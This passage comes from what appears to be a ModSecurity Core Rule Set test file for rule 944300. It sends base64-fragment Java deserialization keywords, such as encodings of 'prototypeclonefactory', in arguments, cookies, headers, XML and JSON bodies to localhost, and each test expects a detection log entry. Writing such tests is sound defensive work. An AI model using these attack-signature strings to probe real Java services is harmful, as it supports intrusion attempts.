"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-275 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 